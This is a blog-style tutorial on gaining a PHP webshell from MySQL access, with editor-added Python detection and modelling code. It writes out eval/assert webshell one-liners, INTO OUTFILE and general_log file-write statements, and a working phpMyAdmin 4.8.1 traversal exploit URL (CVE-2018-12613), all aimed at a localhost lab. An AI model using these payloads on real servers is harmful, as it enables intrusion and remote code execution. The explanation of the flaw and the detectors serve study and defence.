NEKO

mysql->webshell

2018/06/22

References: http://www.freebuf.com/column/143125.html
http://url.cn/5Oqx2CM

The simplest method is to write the file directly with INTO OUTFILE (the path is the author's phpStudy web root). This needs the FILE privilege, and the file is created by the mysqld process, so that OS account must be able to write into the web root:

select '<?php @eval($_POST[neko]);?>' INTO OUTFILE 'D:/phpStudy/PHPTutorial/WWW/neko.php';

However, MySQL is usually started with the --secure-file-priv option set, which blocks this. Check secure_file_priv:

SHOW VARIABLES LIKE '%secure_file_priv%';

What the value means:
If it is the empty string, the variable has no effect (file import/export is not restricted to any path).
If it is a directory name, the server only allows import and export operations on files inside that directory. The directory must already exist; the server will not create it.
If it is NULL, the server disables import and export operations entirely. The NULL setting is permitted as of MySQL 5.7.6.

Via general_log

Once general_log is switched on, every statement the server receives is written to general_log_file, so pointing that file at the web root and then sending the payload as a query turns the log into a PHP file. Both SET GLOBAL statements need the SUPER privilege, and the log is written by the mysqld process, so that OS account must be able to create files in the web root. Run in order:

set global general_log='on';
SET global general_log_file='D:/phpStudy/PHPTutorial/WWW/neko.php';
SELECT '<?php assert($_POST["neko"]);?>';

Contents of neko.php (everything the server logs, including other connections' queries, lands in the file; the PHP only has to appear somewhere in it):

D:\phpstudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
105 Query SHOW WARNINGS
105 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
106 Quit
105 Quit
180622 14:22:58 107 Connect root@localhost on
107 Query SELECT @@version, @@version_comment
107 Query SET NAMES 'utf8mb4' COLLATE 'utf8mb4_general_ci'
107 Query SET lc_messages = 'zh_CN'
180622 14:22:59 108 Connect root@localhost on
107 Query SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`
107 Query SET collation_connection = 'utf8mb4_unicode_ci'
108 Quit
107 Quit
180622 14:23:00 109 Connect root@localhost on
109 Query SELECT @@version, @@version_comment
109 Query SET NAMES 'utf8mb4' COLLATE 'utf8mb4_general_ci'
109 Query SET lc_messages = 'zh_CN'
180622 14:23:01 110 Connect root@localhost on
109 Query SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`
109 Query SET collation_connection = 'utf8mb4_unicode_ci'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
109 Query SELECT '<?php assert($_POST["neko"]);?>'
109 Query SHOW WARNINGS
109 Query SELECT @@lower_case_table_names
109 Query SHOW INDEXES FROM .
109 Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
110 Quit
109 Quit

Turn general_log back off:

set global general_log=off;

Check the general_log settings:

show global variables like "%general%";
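As an added example (editor's code, not from the original post): a small Python detector for the write primitives above, run over constructed log lines laid out the way the general_log excerpt on this page is. It flags SET GLOBAL general_log_file aimed at a web-served extension, INTO OUTFILE/DUMPFILE writes, and PHP open tags inside query text. The extension list and the sample lines are assumptions made for the example.

```python
"""Detect the MySQL-to-webshell primitives described above in general_log text.

Added example, not part of the original post. Parses lines in the layout shown
on the page ("[yymmdd hh:mm:ss] <thread_id> <Command> <argument>") and flags:
  * SET GLOBAL general_log_file pointing at a web-served extension,
  * SELECT ... INTO OUTFILE / DUMPFILE writes,
  * any query text carrying a PHP open tag.
"""
import re
from typing import Dict, Iterable, List

# Assumption: a PHP stack, so these extensions are handed to the interpreter.
WEB_EXTS = (".php", ".phtml", ".php5", ".phar")

# Optional "180622 14:22:58" prefix, then thread id, command, argument.
LOG_LINE = re.compile(
    r"^(?:\d{6}\s+\d{2}:\d{2}:\d{2}\s+)?(?P<id>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$"
)
OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.I)
LOGFILE_RE = re.compile(r"\bSET\s+(?:GLOBAL\s+)?general_log_file\s*=\s*'([^']*)'", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.I)


def classify_query(sql: str) -> List[str]:
    """Return the findings for one query string (empty list if nothing suspicious)."""
    findings: List[str] = []
    m = LOGFILE_RE.search(sql)
    if m and m.group(1).lower().endswith(WEB_EXTS):
        findings.append(f"general_log_file redirected to web-served file: {m.group(1)}")
    m = OUTFILE_RE.search(sql)
    if m:
        kind, path = m.group(1).upper(), m.group(2)
        where = "web-served" if path.lower().endswith(WEB_EXTS) else "arbitrary"
        findings.append(f"INTO {kind} write to {where} path: {path}")
    if PHP_TAG_RE.search(sql):
        findings.append("PHP open tag inside query text")
    return findings


def scan_general_log(lines: Iterable[str]) -> List[Dict]:
    """Scan general_log lines; one dict per flagged Query, in log order."""
    alerts: List[Dict] = []
    for raw in lines:
        m = LOG_LINE.match(raw.strip())
        if not m or m.group("cmd") != "Query":
            continue  # header lines, Connect/Quit records, blank lines
        found = classify_query(m.group("arg"))
        if found:
            alerts.append({"thread": int(m.group("id")),
                           "query": m.group("arg"),
                           "findings": found})
    return alerts


# Constructed sample in the page's general_log layout (not real captured data).
SAMPLE_LOG = """\
180622 14:22:58 107 Connect root@localhost on
107 Query SELECT @@version, @@version_comment
107 Query SHOW VARIABLES LIKE '%secure_file_priv%'
107 Query select '<?php @eval($_POST[neko]);?>' INTO OUTFILE 'D:/phpStudy/PHPTutorial/WWW/neko.php'
109 Query set global general_log='on'
109 Query SET global general_log_file='D:/phpStudy/PHPTutorial/WWW/neko.php'
109 Query SELECT '<?php assert($_POST["neko"]);?>'
109 Query SELECT `SCHEMA_NAME` FROM `INFORMATION_SCHEMA`.`SCHEMATA`
109 Quit
""".splitlines()

if __name__ == "__main__":
    for alert in scan_general_log(SAMPLE_LOG):
        print(alert["thread"], alert["query"])
        for finding in alert["findings"]:
            print("   -", finding)
```

Toggling general_log itself is not flagged, since enabling it is a normal admin action; the signal is where the file is pointed and what is written through it.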

phpMyAdmin 4.8.1 post-login getshell

Just published by the ChaMd5 team (the target-parameter file inclusion tracked as CVE-2018-12613, fixed in 4.8.2; it requires a logged-in phpMyAdmin session).
First add a column to the neko_user table in database neko with the name <?php @eval($_GET[neko]);?>. MySQL stores column names in the table definition file, so D:\phpstudy\PHPTutorial\MySQL\data\neko\neko_user.frm then contains:

<?php@eval($_GET[neko]);?>

(.frm files exist up to MySQL 5.7; 8.0 keeps table definitions in its data dictionary, so this particular file target is not available there.)

Don't use $_POST[neko]; it throws an error.
payload:

http://localhost/phpMyAdmin/index.php?target=db_sql.php%253f/../../../MySQL/data/neko/neko_user.frm&neko=phpinfo();

How it works:
index.php, lines 54~62, contains a file inclusion:

if (!empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && !preg_match('/^index/', $_REQUEST['target'])      // must not start with "index"
    && !in_array($_REQUEST['target'], $target_blacklist)  // must not be import.php or export.php
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

Follow Core::checkPageValidity($_REQUEST['target']) into core.php, line 435:

public static function checkPageValidity(&$page, array $whitelist = []) {
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (!isset($page) || !is_string($page)) {
        return false;
    }

    // 1. exact match against the whitelist
    if (in_array($page, $whitelist)) {
        return true;
    }
    // 2. everything before the first literal '?'
    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    // 3. the same again after a second urldecode(); this copy is what gets
    //    checked, while index.php includes the original $page
    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    return false;
}

The '?' is double-encoded as %253f. PHP decodes the query string once when it fills $_REQUEST, so $_REQUEST['target'] is db_sql.php%3f/../../../MySQL/data/neko/neko_user.frm. That string contains no literal '?', so the first two checks fail, but the third check urldecodes it a second time, cuts at the '?', and gets db_sql.php, which is in the whitelist. include then receives the once-decoded string: the db_sql.php%3f/ component is stepped out of with ../, the .frm file is included, and the PHP stored in the column name runs.
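To make the three branches concrete, here is an added example (the editor's Python model, not phpMyAdmin's code) that ports checkPageValidity() together with the single URL decode PHP applies when it fills $_REQUEST, then runs the payload above through it next to a stricter check. GOTO_WHITELIST is a constructed subset of $goto_whitelist, and check_page_validity_strict is the editor's own hardening, not the upstream fix.

```python
"""Model of phpMyAdmin 4.8.1's Core::checkPageValidity() and of PHP's single
URL decode of the query string, showing why
target=db_sql.php%253f/../../../MySQL/data/neko/neko_user.frm passes the
whitelist check while include() receives a path outside the whitelist.

Added example by the editor; not phpMyAdmin code. GOTO_WHITELIST is a
constructed subset of $goto_whitelist; check_page_validity_strict is the
editor's design, not the upstream fix.
"""
from typing import Callable, Optional, Sequence
from urllib.parse import unquote_plus

# Constructed subset of phpMyAdmin's $goto_whitelist (assumption for this example).
GOTO_WHITELIST = ("db_sql.php", "db_structure.php", "index.php", "sql.php", "tbl_sql.php")

# The $target_blacklist index.php checks before calling checkPageValidity().
TARGET_BLACKLIST = ("import.php", "export.php")


def _before_question_mark(s: str) -> str:
    """PHP's mb_substr($s, 0, mb_strpos($s . '?', '?')): text before the first literal '?'."""
    return s.split("?", 1)[0]


def check_page_validity_481(page: object, whitelist: Sequence[str] = GOTO_WHITELIST) -> bool:
    """Port of the vulnerable 4.8.1 logic. `page` is the already-decoded $_REQUEST value."""
    if not isinstance(page, str):
        return False
    if page in whitelist:                          # branch 1: exact match
        return True
    if _before_question_mark(page) in whitelist:   # branch 2: cut at literal '?'
        return True
    # Branch 3, the flaw: a second decode is applied to the copy being checked,
    # while index.php goes on to include the undecoded `page`.
    decoded = unquote_plus(page)                   # PHP urldecode(): %XX and '+' -> ' '
    return _before_question_mark(decoded) in whitelist


def check_page_validity_strict(page: object, whitelist: Sequence[str] = GOTO_WHITELIST) -> bool:
    """Hardened variant (editor's design): the exact string handed to include()
    must itself be a whitelist entry. No decoding, no truncation at '?'."""
    return isinstance(page, str) and page in whitelist


def php_request_value(raw_query_value: str) -> str:
    """What PHP stores in $_REQUEST['target']: one round of URL decoding."""
    return unquote_plus(raw_query_value)


def simulate_index_php(raw_query_value: str, check: Callable[[str], bool]) -> Optional[str]:
    """Mirror the index.php gate: the path include() would receive, or None if rejected."""
    target = php_request_value(raw_query_value)
    if target.startswith("index") or target in TARGET_BLACKLIST:
        return None
    return target if check(target) else None


if __name__ == "__main__":
    payload = "db_sql.php%253f/../../../MySQL/data/neko/neko_user.frm"
    print("4.8.1 includes:", simulate_index_php(payload, check_page_validity_481))
    print("strict includes:", simulate_index_php(payload, check_page_validity_strict))
```

The strict variant deliberately refuses query strings on the included value. The general rule it encodes: validate the exact string you are about to include, never a decoded or truncated copy of it.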

Original author: n3k0

Published: June 22nd 2018, 2:31:59
